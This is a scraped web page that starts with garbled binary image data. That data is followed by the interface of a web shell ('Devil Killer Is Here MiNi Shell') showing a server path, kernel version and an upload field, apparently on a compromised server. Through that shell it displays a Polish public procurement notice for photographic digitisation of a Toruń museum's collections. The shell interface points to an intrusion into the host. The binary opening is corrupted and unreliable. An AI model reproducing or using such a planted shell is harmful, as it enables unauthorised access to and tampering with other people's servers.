JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0062875601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Digitalizacja zbiorów muzealnych w ramach projektu wewnętrznego - Digitalizacja zbiorów Muzeum Pamięć i Tożsamość im.<br/>św. Jana Pawła II (w organizacji), ul. Droga Starotoruńska 1A, 87-100 Toruń. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Pamięć i Tożsamość im. Św. Jana Pawła II (w organizacji) w Toruniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 380713458</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Droga Starotoruńska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@muzeumpamiecitozsamosc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://muzeumpamiecitozsamosc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Digitalizacja zbiorów muzealnych w ramach projektu wewnętrznego - Digitalizacja zbiorów Muzeum Pamięć i Tożsamość im.<br/>św. Jana Pawła II (w organizacji), ul. Droga Starotoruńska 1A, 87-100 Toruń. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-802b44c3-7645-489c-ad41-ebf0febbeb15</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00628756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00032688/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Digitalizacja zbiorów muzealnych w ramach projektu wewnętrznego „Digitalizacja zbiorów Muzeum Pamięć i Tożsamość w Toruniu”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-802b44c3-7645-489c-ad41-ebf0febbeb15 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1.Wykonawca składa ofertę za<br/>pośrednictwem Formularza Oferty/wnioski” dostępnego na Platformie e-Zamówienia.<br/>2. Oferta musi zostać złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem<br/>3. Po upływie terminu składania i otwarcia wniosków, ofert, prac konkursowych Zamawiający za pośrednictwem Platformy e<br/>Zamówienia dokonuje czynności automatycznej deszyfracji wniosków, ofert, prac konkursowych.<br/>4. Wykonawca ma możliwość złożenia i wycofania oferty, wniosku, pracy konkursowej do upływu terminu składania ofert, wniosków,<br/>prac konkursowych.<br/>5. W celu zapewnienia poprawności działania funkcjonalności udostępnianych na Platformie Zamawiający i Wykonawcy zobligowani<br/>są do korzystania jedynie z udostępnianiach na Platformie e-Zamówienia formularzy do komunikacji oraz formularza ofertowego,<br/>wniosku, pracy konkursowej oraz wykonywania poszczególnych czynności zgodnie z komunikatami i poleceniami systemowymi.<br/>6. Oferta, która nie dotarła do Zamawiającego w wymaganym terminie do miejsca składania ofert (bez względu na przyczynę) będzie<br/>traktowana jako złożona po terminie składania ofert i odrzucona zgodnie z art. 226 ust. 1 pkt 1) ustawy Pzp.<br/>7. W przypadku awarii systemu teleinformatycznego (platformy) przy użyciu którego Zamawiający otwiera oferty, która powoduje<br/>brak możliwości otwarcia ofert w terminie określonym przez Zamawiającego, otwarcie ofert następuje niezwłocznie po usunięciu<br/>awarii.<br/>8. Opóźnienie otwarcia ofert, wynikające z awarii systemu teleinformatycznego (platformy) przy użyciu którego Zamawiający otwiera<br/>oferty, nie stanowi podstawy do unieważnienia niniejszego postępowania.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>10. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>11. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>12. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@muzeumpamiecitozsamosc.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 roku<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119<br/>z 4.05.2016, str. 1), dalej „RODO”, informuję że:<br/>1) administratorem Pani/Pana danych osobowych jest Muzeum „Pamięć i Tożsamość” im. św. Jana Pawła II<br/>(w organizacji), ul. Droga Starotoruńska 3, 87-100 Toruń, NIP: 9562337347, REGON: 380713458,<br/>2) wpisane do Rejestru Instytucji Kultury prowadzonego przez Ministra Kultury i Dziedzictwa Narodowego pod<br/>numerem RIK 110/2018,<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego objętego niniejszym postępowaniem,<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 i 74 ustawy Prawo zamówień publicznych,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Prawo zamówień publicznych, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy,<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego,<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 RODO,<br/>8) posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczania przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2,<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>9) nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>10) skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie<br/>może naruszać integralności protokołu oraz jego załączników.<br/>11) prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej, lub z uwagi na ważne względu interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dodatkowo stosownie do art. 19 ust. 4 ustawy pzp, Zamawiający informuje o<br/>ograniczeniach, o których mowa w art. 4 ust. 2 i 3 oraz art. 75 ustawy pzp:<br/>Zamawiający udostępnia dane osobowe, o których mowa w art.10, w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa dziale IX ustawy pzp, do upływu terminu na ich wniesienie;<br/>skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o których mowa w art. 16, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą pzp.<br/>w postępowaniu o udzielenie zamówienia zgłaszanie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>Przetwarzane dane osobowe mogą być pozyskiwane od Wykonawców, których dane dotyczą lub innych podmiotów, na których<br/>zasoby powołują się Wykonawcy. Wykonawca jest zobowiązany w związku z udziałem w przedmiotowym postępowaniu, do<br/>wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO związanych z udziałem w przedmiotowym<br/>postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane<br/>te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego;<br/>obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób<br/>pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MPiTJPII/ZP-01/12/2024/PK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Digitalizacja zbiorów muzealnych w ramach projektu wewnętrznego - Digitalizacja zbiorów Muzeum Pamięć i Tożsamość im.<br/>św. Jana Pawła II (w organizacji), ul. Droga Starotoruńska 1A, 87-100 Toruń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79961000-8 - Usługi fotograficzne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">5.	Sposób oceny ofert:<br/><br/>1)	„Cena oferty brutto” – 60 % (60 pkt) – będzie rozpatrywana na podstawie ceny oferty brutto za wykonanie całego przedmiotu zamówienia w okresie do 30.12.2024 r., podanej przez Wykonawcę w Formularzu oferty. Oferty będą badane według poniższego wzoru:<br/>Liczba punktów zdobytych w kryterium<br/>„Cena oferty brutto”<br/> 60pkt<br/><br/>2)	„Jakość“ - waga kryterium 40 %. W zakresie kryterium „jakość” ocena nastąpi w skali punktowej od 0 do 40 punktów, na następujących zasadach:<br/>40 punktów zostanie przyznanych na podstawie oceny próbek wykonanych zdjęć, które powinny zostać dołączone do oferty. Wykonawca dostarczy Zamawiającemu pliki cyfrowe zdigitalizowanych 35 obiektów muzealnych, w tym: fotografie 5 obrazów olejnych – po dwie na każdy obiekt (lico z wzorcem kolorów i odwrocie), fotografie 5 militariów – przynajmniej po 3 ujęcia każdego, w tym po jednym z wzorcem kolorów, fotografie 10 obiektów rzemiosła artystycznego – przynajmniej po 3 ujęcia każdy, w tym po jednym z wzorcem kolorów; zdjęcia powinny przedstawiać np. następujące rodzaje obiektów: meble, szkło, ceramika, tkaniny lub ubiory, złotnictwo, rzeźba, przedmioty codziennego użytku, fotografie 10 obiektów na podłożu papierowym – po dwie na obiekt, awers z wzorcem kolorów i odwrocie; zdjęcia przedstawiające np. następujące rodzaje obiektów: grafika, rysunek, akwarela, fotografie, dokumenty archiwalne, rękopisy, maszynopisy, gazety, fotografie 5 numizmatów – po dwie na obiekt, awers i rewers, w tym przynajmniej jedno z wzorcem kolorów; zdjęcia przedstawiające np. monety, brakteaty, medale okolicznościowe. Każdy z plików musi zostać dostarczony zarówno w formatach RAW oraz TIFF po obróbce graficznej. Zamawiający oceni ww. próbki z uwzględnieniem następujących podkryteriów;<br/>a)	OŚWIETLENIE<br/>Wykonawca otrzyma 10 pkt, jeżeli zastosował prawidłowy dobór oświetlenia w zależności od rodzaju obiektu i będzie ono równomierne, neutralne przy braku dominant barwnych oraz odbić efektów otoczenia. Wykonawca otrzyma 0 pkt, jeżeli oświetlenie będzie dobrane niezgodnie z rodzajem obiektu, nierównomierne, nieneutralne z widocznymi dominantami barwnymi oraz widocznym odbiciem elementów otoczenia.<br/>b)	BRAK BLIKOWANIA<br/>Wykonawca otrzyma 10 pkt, jeżeli na zdjęciu nie ma widocznego blikowania uniemożliwiającego prawidłowy ogląd dzieła. W przypadku gdy nie da się uniknąć blikowania w 100%, oczekiwany efekt to takie oświetlenie aby blikowanie było jak najbardziej naturalne. Wykonawca otrzyma 0 pkt, jeżeli na zdjęciu widoczne jest blikowanie, bądź nie wkomponowano blikowania w taki sposób aby było jak najbardziej naturalne.<br/>c)	OSTROŚĆ<br/>Wykonawca otrzyma 10 pkt, jeżeli wizerunek obiektu wraz ze szczegółamibędzie miał prawidłową ostrość (oceniana na monitorze referencyjnym przy powiększeniu 100 %) lub jeżeli wykonawca dysponuje próbkami zawierającymi wzorniki umożliwiające odczyt parametrów określających ostrość (MTF-10, MTF-50, SFR). Wykonawca otrzyma 0 pkt, jeżeli wizerunek obiektu wraz ze wszystkimi szczegółami nie będzie miał prawidłowej ostrości (oceniana na monitorze referencyjnym przy powiększeniu 66%). oraz za pomocą próbników (MTF-10, MTF-50, SFR).<br/>d)	ODWZOROWANIE BARW<br/>Wykonawca otrzyma 10 pkt, jeżeli wizerunek obiektu będzie spełniał jakość określoną w metodologii FADGI na 4 gwiazdki w zakresie odwzorowania barw. Wykonawca otrzyma 0 pkt, jeżeli wizerunek obiektu nie będzie spełniał powyższych wymagań. Ocena próbek odbędzie się w oparciu o metodologię FADGI.<br/><br/>Zdjęcia muszą być wykonane zgodnie z zaleceniami NIMOZ określonymi w zalecaniach „Cyfrowa fotografia w dokumentacji muzealnej” NIMOZ, 2013. Wszystkie ujęcia muszą spełniać wymienione wyżej wymagania z każdej kategorii by uzyskać odpowiednią ilość punktów. W przeciwnym razie oferta otrzyma 0 punktów w danym podkryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość - próbek wykonanych zdjęć</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać<br/>w sposób szczególny.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>- Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób<br/>szczególny.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>- Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny.<br/>d) zdolności technicznej lub zawodowej:<br/>a) Zamawiający wymaga wykazania przez Wykonawcę, że w ostatnich 3 latach przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty co najmniej jedno zlecenie obejmujące digitalizację nie mniej niż 500 obiektów o charakterze<br/>muzealnym, wśród których były m.in. obiekty na podłożu papierowym, rzemiosło artystyczne, obrazy olejne,<br/>o wartości nie mniejszej niż 150.000,00 zł netto.<br/>b) Zamawiający wymaga dysponowania przez Wykonawcę następującymi osobami, które skieruje do realizacji<br/>zamówienia tj.:<br/>- co najmniej dwoma fotografami, z których każdy posiada co najmniej 3-letnie doświadczenie w digitalizacji<br/>obiektów muzealnych, z których co najmniej jeden posiada imienny certyfikat z ukończenia szkolenia z<br/>zarządzania barwą w digitalizacji na poziomie FADGI 4 star Image Science Associates lub równoważne np.<br/>Adobe Training Center,<br/>- co najmniej jednym grafikiem, który posiada co najmniej 3-letnie doświadczenie w postprodukcji zdjęć<br/>obiektów muzealnych.<br/>c) Zamawiający wymaga, aby wykonawca dysponował co najmniej dwoma zestawami narzędzi, zgodnymi z<br/>normami:<br/>- FADGI w zakresie reprodukcji,<br/>- zasady fotografowania określone w „Cyfrowa fotografia w dokumentacji muzealnej” NIMOZ, 2013.:<br/>https://nimoz.pl/files/publications/50/Cyfrowa_fotografia_w_dokumentacji_muzealnej_NIMOZ_2013.p<br/>df<br/>na które składają się co najmniej:<br/>a. cyfrowy aparat o matrycy min. 100Mpx, i drugi o matrycy min. 60Mpx,<br/>b. obiektywy stałoogniskowe kompatybilne z aparatami,<br/>c. studyjny sprzęt oświetleniowy,<br/>d. modyfikatory światła, blendy,<br/>e. statyw, kolumna reprodukcyjna,stół do reprodukcji,<br/>f. wzorce kolorów min. dwa zestawy o 24 polach barwnych (oraz wzorzec kolorów do kalibracji),<br/>g. tła kartonowe i PVC, dopuszczalne: białe, czarne,szare i gradientowe,<br/>h. oprogramowanie do digitalizacji i postprodukcji, sprzęt komputerowy, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 